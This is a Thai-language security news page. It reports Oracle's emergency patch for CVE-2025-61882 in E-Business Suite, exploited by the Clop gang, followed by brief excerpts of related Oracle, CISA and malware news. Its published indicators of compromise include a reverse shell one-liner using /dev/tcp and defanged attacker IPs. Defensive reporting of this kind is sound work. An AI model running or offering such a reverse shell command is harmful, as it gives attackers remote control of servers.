Oracle ออกคำเตือนเกี่ยวกับช่องโหว่ Zero-day ระดับ critical ในระบบ E-Business Suite ซึ่งมีหมายเลข CVE-2025-61882 โดยช่องโหว่นี้ทำให้ผู้โจมตีสามารถรันโค้ดที่เป็นอันตรายจากระยะไกลได้โดยไม่ต้องผ่านการยืนยันตัวตน และช่องโหว่นี้กำลังถูกนำไปใช้จริงในการโจมตีเพื่อขโมยข้อมูลจากกลุ่ม Clop

ช่องโหว่นี้อยู่ในผลิตภัณฑ์ Oracle Concurrent Processing ของ Oracle E-Business Suite (component: BI Publisher Integration) และมีคะแนน CVSS 9.8 เนื่องจากไม่ต้องผ่านการยืนยันตัวตน และสามารถถูกโจมตีได้ง่าย

ตามที่ Oracle ระบุไว้ในเอกสารคำแนะนำฉบับใหม่ว่า “การแจ้งเตือนด้านความปลอดภัยฉบับนี้มีขึ้นเพื่อจัดการกับช่องโหว่ CVE-2025-61882 ในระบบ Oracle E-Business Suite”

ช่องโหว่นี้สามารถถูกโจมตีจากระยะไกลได้โดยไม่ต้องผ่านการยืนยันตัวตน โดยผู้โจมตีสามารถใช้ประโยชน์จากช่องโหว่นี้ผ่านเครือข่ายได้ โดยไม่จำเป็นต้องมีชื่อผู้ใช้ หรือรหัสผ่าน และหากการโจมตีสำเร็จ อาจส่งผลให้เกิดการรันโค้ดที่เป็นอันตรายจากระยะไกลได้

Oracle ยืนยันว่า ช่องโหว่แบบ zero-day ดังกล่าว ส่งผลกระทบต่อระบบ Oracle E-Business Suite เวอร์ชัน 12.2.3 ถึง 12.2.14 และได้ออกแพตซ์อัปเดตฉุกเฉิน (emergency update) เพื่อแก้ไขช่องโหว่นี้แล้ว

บริษัทระบุว่า ลูกค้าจะต้องติดตั้ง Critical Patch Update ประจำเดือนตุลาคม 2023 ก่อน จึงจะสามารถติดตั้งแพตซ์อัปเดตความปลอดภัยชุดใหม่ได้

เนื่องจากมีการเปิดเผย PoC exploit ออกมาแล้ว และช่องโหว่นี้กำลังถูกใช้ในการโจมตีจริง จึงจำเป็นที่ผู้ดูแลระบบ Oracle จะต้องติดตั้งอัปเดตความปลอดภัยโดยเร็วที่สุด

ช่องโหว่ zero-day ดังกล่าวถูกนำไปใช้ในการโจมตีเพื่อขโมยข้อมูลโดยกลุ่ม Clop

แม้ว่า Oracle จะไม่ได้ระบุอย่างชัดเจนว่าช่องโหว่นี้เป็น zero-day แต่บริษัทได้เปิดเผย Indicators of Compromise (IoCs) ซึ่งสอดคล้องกับโค้ดการโจมตีใน Oracle EBS ที่กลุ่มผู้โจมตีแชร์กันเมื่อไม่นานมานี้บน Telegram

Charles Carmakal ประธานเจ้าหน้าที่ฝ่ายเทคนิค (CTO) ของ Mandiant – Google Cloud ยืนยันว่าช่องโหว่ CVE-2025-61882 และช่องโหว่อื่น ๆ ที่ Oracle แก้ไขไปเมื่อเดือนกรกฎาคมนั้น ถูกกลุ่มแรนซัมแวร์ Clop นำไปใช้โจมตี และขโมยข้อมูลจากเซิร์ฟเวอร์ Oracle E-Business Suite ในเหตุการณ์การขโมยข้อมูลเมื่อเดือนสิงหาคม 2025

Carmakal ระบุผ่าน LinkedIn ว่า “กลุ่ม Clop ได้ใช้ช่องโหว่หลายรายการใน Oracle EBS เพื่อขโมยข้อมูลจำนวนมากจากเหยื่อหลายรายในเดือนสิงหาคม 2025”

Carmakal ระบุเพิ่มเติมว่า มีการใช้ช่องโหว่หลายรายการในการโจมตี รวมถึงช่องโหว่ที่ถูกแพตช์ไปแล้วในการอัปเดตของ Oracle เมื่อเดือนกรกฎาคม 2025 และช่องโหว่ที่เพิ่งถูกแก้ไขไปเมื่อสุดสัปดาห์ที่ผ่านมา (CVE-2025-61882)

ข่าวเกี่ยวกับแคมเปญการโจมตีครั้งล่าสุดของกลุ่ม Clop ถูกเผยแพร่ครั้งแรกเมื่อสัปดาห์ที่แล้ว เมื่อทีม Mandiant และ Google Threat Intelligence Group (GTIG) รายงานว่ากำลังติดตามแคมเปญใหม่ที่มีหลายบริษัทได้รับอีเมลซึ่งอ้างว่ามาจากกลุ่มผู้โจมตี

อีเมลเหล่านั้นระบุว่ากลุ่ม Clop ได้ขโมยข้อมูลจากระบบ Oracle E-Business Suite ของบริษัท และกำลังเรียกค่าไถ่เพื่อไม่ให้ข้อมูลที่ขโมยไปถูกนำออกไปเผยแพร่สู่สาธารณะ

เนื้อหาในอีเมลที่ถูกเรียกค่าไถ่ที่มีการแชร์ให้กับ BleepingComputer ระบุว่า "พวกเรา CL0P team หากคุณยังไม่เคยได้ยินข้อมูลเกี่ยวกับเรา คุณสามารถค้นหาข้อมูลเกี่ยวกับเราได้ทาง Google บนอินเทอร์เน็ต"

“เราเพิ่งโจมตีไปที่ระบบ Oracle E-Business Suite ของคุณได้สำเร็จ และได้ Copy เอกสารจำนวนมากออกมา ตอนนี้ไฟล์ส่วนตัวทั้งหมด และข้อมูลอื่น ๆ ของคุณถูกเก็บอยู่ในระบบของเราแล้ว”

กลุ่ม Clop มีประวัติยาวนานในการใช้ประโยชน์จากช่องโหว่แบบ zero-day ทำการโจมตีเพื่อขโมยข้อมูลครั้งใหญ่หลายครั้งในช่วงหลายปีที่ผ่านมา อาทิเช่น

ปี 2020: ใช้ช่องโหว่แบบ zero-day ในแพลตฟอร์ม Accellion FTA ส่งผลกระทบกับบริษัทเกือบ 100 องค์กร
ปี 2021: ใช้ช่องโหว่แบบ zero-day ในซอฟต์แวร์ SolarWinds Serv-U FTP
ปี 2023: ใช้ช่องโหว่แบบ zero-day ในแพลตฟอร์ม GoAnywhere MFT โจมตีบริษัทมากกว่า 100 องค์กร
ปี 2023: ใช้ช่องโหว่แบบ zero-day ในระบบ MOVEit Transfer ซึ่งถือเป็นแคมเปญที่ใหญ่ที่สุดของกลุ่ม Clop จนถึงปัจจุบัน ทำให้สามารถขโมยข้อมูลจาก 2,773 องค์กรทั่วโลก
ปี 2024: ใช้ช่องโหว่ zero-day จำนวนสองรายการในระบบ Cleo file transfer (CVE-2024-50623 และ CVE-2024-55956) เพื่อขโมยข้อมูล และเรียกค่าไถจากบริษัทต่าง ๆ

ในเวลาต่อมากลุ่ม Clop ได้ยืนยันกับ BleepingComputer ว่า พวกเขาอยู่เบื้องหลังอีเมลเรียกค่าไถ่ และระบุว่าพวกเขาใช้ประโยชน์จากช่องโหว่ Oracle zero-day เพื่อขโมยข้อมูล

อย่างไรก็ตาม ในช่วงแรก Oracle ได้เชื่อมโยงแคมเปญการเรียกค่าไถ่ของกลุ่ม Clop เข้ากับช่องโหว่ที่ถูกแพตช์ไปแล้วในเดือนกรกฎาคม 2025 แทนที่จะเป็นช่องโหว่ zero-day ตัวใหม่ ที่ภายหลังถูกยืนยันว่าเป็นช่องโหว่ที่ใช้ในการโจมตีครั้งนี้

Oracle ได้เปิดเผย IoCs สำหรับการโจมตีจากช่องโหว่ zero-day ซึ่งมี 2 IP addresses ที่พบว่าถูกใช้ในการโจมตีเซิร์ฟเวอร์ และคำสั่งที่ใช้เปิด remote shell รวมไปถึง exploit archive และไฟล์ที่เกี่ยวข้องในการโจมตี ดังนี้

200[.]107[.]207[.]26 - IP address ที่เชื่อมโยงกับการโจมตี (HTTP GET และ POST requests)
185[.]181[.]60[.]11 - IP address ที่เชื่อมโยงกับการโจมตี (HTTP GET และ POST requests)
sh -c /bin/bash -i >& /dev/tcp// 0>&1 - คำสั่งที่เรียกใช้งาน reverse shell
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d - oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.

Oracle ออกมาปฏิเสธว่าไม่ได้ถูกโจมตีระบบ หลังจากที่ Hacker อ้างว่าสามารถขโมยข้อมูลจาก SSO login servers ของ Oracle Cloud กว่า 6 ล้านรายการ

Oracle ให้ข้อมูลกับ BleepingComputer ว่า ไม่มีการโจมตีเกิดขึ้นกับ Oracle Cloud ข้อมูลที่ถูกเผยแพร่นั้นไม่ใช่ข้อมูลของ Oracle Cloud รวมถึงลูกค้าของ Oracle Cloud ไม่มีรายใดที่พบการโจมตี หรือสูญเสียข้อมูลใด ๆ

การปฏิเสธนี้ออกมาหลังจากที่ Hacker ในชื่อ rose87168 เปิดเผยข้อมูล text file จำนวนมากในวันที่ 20 มีนาคม 2025 โดยประกอบไปด้วยตัวอย่างข้อมูลในฐานข้อมูล, ข้อมูล LDAP และรายชื่อบริษัทที่ขโมยไปจาก SSO platform ของ Oracle Clouds

รวมถึง Hacker ได้แสดงหลักฐานว่าสามารถเข้าถึง Oracle Cloud servers ได้ โดยแสดง URL ของ Internet Archive ซึ่งระบุว่าได้อัปโหลดไฟล์ .txt ที่มีที่อยู่อีเมล ProtonMail ไปยัง login.

CISA ของสหรัฐฯ ได้เพิ่มช่องโหว่ด้านความปลอดภัย 2 รายการที่ส่งผลกระทบต่อ Adobe ColdFusion และ Oracle Agile Product Lifecycle Management (PLM) เข้าสู่รายการช่องโหว่ที่กำลังถูกนำไปใช้ในการโจมตีจริง (KEV) โดยอ้างอิงจากหลักฐานการถูกโจมตีจริง (more…)

Oracle แนะนำให้ลูกค้าติดตั้ง Critical Patch Update (CPU) ประจำเดือนมกราคม 2025 เพื่อแก้ไขช่องโหว่ด้านความปลอดภัยใหม่จำนวน 318 รายการที่พบในผลิตภัณฑ์ และบริการต่าง ๆ ของบริษัท (more…)

นักวิจัยพบ TargetCompany ransomware เวอร์ชัน Linux ตัวใหม่ ที่กำลังกำหนดเป้าหมายการโจมตีไปที่ VMware ESXi environments โดยใช้ custom shell script เพื่อส่ง และเรียกใช้เพย์โหลดที่เป็นอันตราย

TargetCompany หรือในชื่อ Mallox, FARGO และ Tohnichi ซึ่งเริ่มพบการโจมตีมาตั้งแต่เดือนมิถุนายน 2021 โดยมีเป้าหมายการโจมตีไปยัง database (MySQL, Oracle, SQL Server) ขององค์กรส่วนใหญ่ในไต้หวัน เกาหลีใต้ ไทย และอินเดีย

ในเดือนกุมภาพันธ์ 2022 ทาง Avast บริษัทแอนตี้ไวรัส ได้เผยแพร่เครื่องมือถอดรหัส ransomware ฟรี ที่สามารถถอดรหัสเวอร์ชันต่าง ๆ ของ TargetCompany ได้ ซึ่งต่อมาในเดือนกันยายน 2022 กลุ่ม TargetCompany ransomware ได้กลับมาปฏิบัติการอีกครั้ง โดยมุ่งเป้าหมายการโจมตีไปที่ Microsoft SQL ที่มีช่องโหว่ และข่มขู่เหยื่อด้วยการเผยแพร่ข้อมูลที่ถูกขโมยออกมาผ่านทาง Telegram

TargetCompany ransomware เวอร์ชัน Linux ตัวใหม่

Trend Micro บริษัทรักษาความปลอดภัยทางไซเบอร์รายงานว่า TargetCompany ransomware เวอร์ชัน Linux ตัวใหม่ สามารถตรวจสอบได้ว่ามีสิทธิ์ระดับผู้ดูแลระบบก่อนที่จะดำเนินการโจมตีหรือไม่

ในการดาวน์โหลด และการเรียกใช้งานเพย์โหลดของแรนซัมแวร์ Hacker จะใช้ custom shell script ที่สามารถขโมยข้อมูลไปเก็บไว้ยังเซิร์ฟเวอร์ที่อยู่คนละที่กันสองเซิร์ฟเวอร์ได้ เผื่อในกรณีที่เกิดปัญหาทางเทคนิคกับเครื่องเหยื่อ โดยเพย์โหลดจะตรวจสอบว่ากำลังทำงานในสภาพแวดล้อม VMware ESXi หรือไม่ โดยการรันคำสั่ง 'uname' และค้นหา 'vmkernel'

จากนั้น ไฟล์ “TargetInfo.

Oracle ออกคำแนะนำเกี่ยวกับการอัปเดต Critical Patch สำหรับเดือนมกราคม 2024 เพื่อแก้ไขช่องโหว่ที่ครอบคลุมหลายผลิตภัณฑ์ โดยการอัปเดตนี้มีการแก้ไขช่องโหว่ทั้งหมด 389 รายการ ซึ่งรวมถึงแพตซ์สำหรับช่องโหว่ระดับ critical

ช่องโหว่ที่มีความเสี่ยงสูงใน Critical Patch Update ของ Oracle ในเดือนมกราคม 2024

ช่องโหว่จำนวนมากภายใน Oracle Patch Update ในเดือนมกราคม 2024 ที่ได้รับการจัดประเภทด้วยคะแนน CVSS เกิน 9.0 ซึ่งแสดงถึงความรุนแรงในระดับ critical ซึ่งช่องโหว่เหล่านี้มีความเสี่ยงต่อการถูกใช้ในการโจมตีจากระยะไกลโดยไม่จำเป็นต้องผ่านการตรวจสอบสิทธิ์ (more…)

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) หรือหน่วยงานรักษาความปลอดภัยทางไซเบอร์ และโครงสร้างพื้นฐานของสหรัฐ ได้เพิ่มช่องโหว่ 3 รายการไปยัง Known Exploited Vulnerabilities (KEV) ซึ่งเป็นรายการช่องโหว่ที่กำลังถูกนำมาใช้ในการโจมตี (more…)

เมื่อวันที่ 2 กุมภาพันธ์ หน่วยงานความมั่นคงปลอดภัยทางไซเบอร์ และโครงสร้างพื้นฐานของสหรัฐ (CISA) ได้เพิ่มช่องโหว่ด้านความปลอดภัย 2 รายการ ได้แก่ ช่องโหว่บน Oracle E-Business Suite และช่องโหว่บน SugarCRM ไปยัง Known Exploited Vulnerabilities (KEV) เนื่องจากพบการโจมตีโดยใช้ช่องโหว่ทั้ง 2 รายการแล้วในปัจจุบัน ซึ่งก่อนหน้านี้ทาง CISA ได้เพิ่ม CVE-2017-11357 (คะแนน CVSS: 9.8 ระดับความรุนแรงสูงมาก) ซึ่งเป็นช่องโหว่ที่ส่งผลกระทบต่อ Telerik UI ทำให้สามารถสั่งการ และอัพโหลดไฟล์ได้จากระยะไกล

ช่องโหว่บน Oracle E-Business Suite

CVE-2022-21587 (คะแนน CVSS: 9.8 ระดับความรุนแรงสูงมาก) เป็นช่องโหว่ของผลิตภัณฑ์ Oracle Web Applications Desktop Integrator โดย Oracle E-Business Suite โดยเป็นช่องโหว่ที่สามารถหลบเลี่ยงการตรวจสอบสิทธิในการเข้าถึงเครือข่ายผ่าน HTTP protocol

Oracle Web Applications Desktop Integrator ที่ได้รับผลกระทบ

Oracle Web Applications Desktop Integrator Version 2.3 ถึง 12.2.11

ซึ่งทาง Oracle ได้ออกแพตซ์อัปเดตเพื่อปิดช่องโหว่แล้วในเดือนตุลาคม 2022

ช่องโหว่บน SugarCRM

CVE-2023-22952 (คะแนน CVSS: 8.8 ระดับความรุนแรงสูง) เป็นช่องโหว่การตรวจสอบความถูกต้องของอินพุตใน SugarCRM ซึ่งทำให้สามารถโจมตีแบบ PHP injection ได้

SugarCRM ** ที่ได้รับผลกระทบ

SugarCRM Version 0.0
SugarCRM Version 12.0.0

ซึ่งทาง SugarCRM ได้ออกแพตซ์อัปเดตเพื่อปิดช่องโหว่แล้วใน Version 11.0.5 และ 12.0.2

การป้องกัน

ควรเร่งดำเนินการอัปเดตเพื่อปิดช่องโหว่โดยเร็วที่สุด

 

ที่มา : thehackernews

วันจันทร์ที่ 28 พฤศจิกายน 2022 ที่ผ่านมา สำนักงานความมั่นคงปลอดภัยทางไซเบอร์ และโครงสร้างพื้นฐานของอเมริกา (CISA) ได้เพิ่มช่องโหว่ที่ส่งผลกระทบต่อ Oracle Fusion Middleware ลงในแค็ตตาล็อกช่องโหว่ (KEV) โดยช่องโหว่มีหมายเลข CVE-2021-35587 มีคะแนน CVSS 9.8 โดยส่งผลกระทบต่อ Oracle Access Manager (OAM) เวอร์ชัน 11.1.2.3.0, 12.2.1.3.0 และ 12.2.1.4.0 ทำให้ผู้โจมตีที่ไม่ผ่านการยืนยันตัวตนมีสิทธิ์เข้าถึงเครือข่ายได้ทั้งหมด และใช้คำสั่งในอินสแตนซ์ประมวลผลคำสั่งจากระยะไกลในการเข้าถึงข้อมูล นอกจากนี้ยังอนุญาตให้ผู้โจมตีเข้าถึงเซิร์ฟเวอร์ OAM เป็นซอฟต์แวร์จากค่าย Oracle ซึ่งมีหน้าที่ในการช่วยจัดการกระบวนการพิสูจน์ และยืนยันตัวตนในรูปแบบของ Single Sign-On ในหลายรูปแบบอุปกรณ์

Greynoise ผู้เชี่ยวชาญด้าน Cybersecurity ยังเห็นว่าความพยายามในการโจมตีนั้นดำเนินไปอย่างต่อเนื่อง และมาจากสหรัฐอเมริกา จีน สิงคโปร์ และแคนาดา นอกจากนี้ CISA ที่เพิ่มรายการลงในแค็ตตาล็อกช่องโหว่ (KEV) ยังเป็นช่องโหว่ heap buffer overflow ที่พึ่งได้รับการแก้ไขในเว็บเบราว์เซอร์ Google Chrome (CVE-2022-4135) ซึ่งผู้ให้บริการอินเทอร์เน็ตยักษ์ใหญ่ยอมรับว่าถูกโจมตีจริง ดังนั้นหน่วยงานของรัฐบาลกลางจะต้องอัปเดตแพตช์ภายในวันจันทร์ที่ 19 ธันวาคม 2022 เพื่อรักษาความปลอดภัยเครือข่ายจากภัยคุกคามที่อาจเกิดขึ้นในครั้งนี้

ที่มา : thehackernews

นักวิจัยจาก Palo Alto Network ได้เปิดเผยถึงการตรวจพบมัลแวร์ Cryptojacking ชนิดใหม่ที่มีชื่อว่า Pro-Ocean ของกลุ่มแฮกเกอร์ Rocke ที่พุ่งเป้าหมายไปยังเซิร์ฟเวอร์อินสแตนซ์ที่มีช่องโหว่ของ Apache ActiveMQ, Oracle WebLogic และ Redis

มัลแวร์ Pro-Ocean กำหนดเป้าหมายการโจมตีไปยังแอปพลิเคชันบนคลาวด์เซิร์ฟเวอร์และใช้ประโยชน์จากช่องโหว่ของเซิร์ฟเวอร์ Oracle WebLogic (CVE-2017-10271), Apache ActiveMQ (CVE-2016-3088) และอินสแตนซ์ Redis ที่ไม่ได้รับการแพตช์ความปลอดภัยเพื่อเข้าควบคุมเซิร์ฟเวอร์ของเป้าหมาย

นักวิจัยจาก Palo Alto Networks ได้ทำการวิเคราะห์มัลแวร์และพบว่ามัลแวร์มีความสามารถของรูทคิตและเวิร์มที่ถูกทำการปรับปรุงใหม่ ซึ่งจะช่วยให้มัลแวร์สามารถซ่อนกิจกรรมที่เป็นอันตรายและแพร่กระจายไปยังซอฟต์แวร์ที่อยู่บนเครือข่ายของเป้าหมายได้ นอกจากนี้มัลแวร์ยังมีความสามารถของ Cryptojacking ที่ถูกใช้ในการขุด Monero ที่มาพร้อมกับโมดูลที่จะคอย Monitor การใช้งานของ CPU ซึ่งถาหากมีการใช้งาน CPU มากกว่า 30% ตัวมัลแวร์จะทำการ Kill โปรเซสการทำงานทิ้ง เพื่อเป็นการป้องกันการถูกตรวจจับความผิดปกติของการทำงาน

ทั้งนี้ผู้ดูแลระบบเซิร์ฟเวอร์ Oracle WebLogic, Apache ActiveMQ และอินสแตนซ์ Redis ควรรีบทำการอัปเดตแพตช์ความปลอดภัยให้เป็นเวอร์ชันล่าสุดเพื่อป้องกันการตกเป็นเป้าหมายการโจมตีของมัลแวร์ Pro-Ocean

ที่มา: bleepingcomputer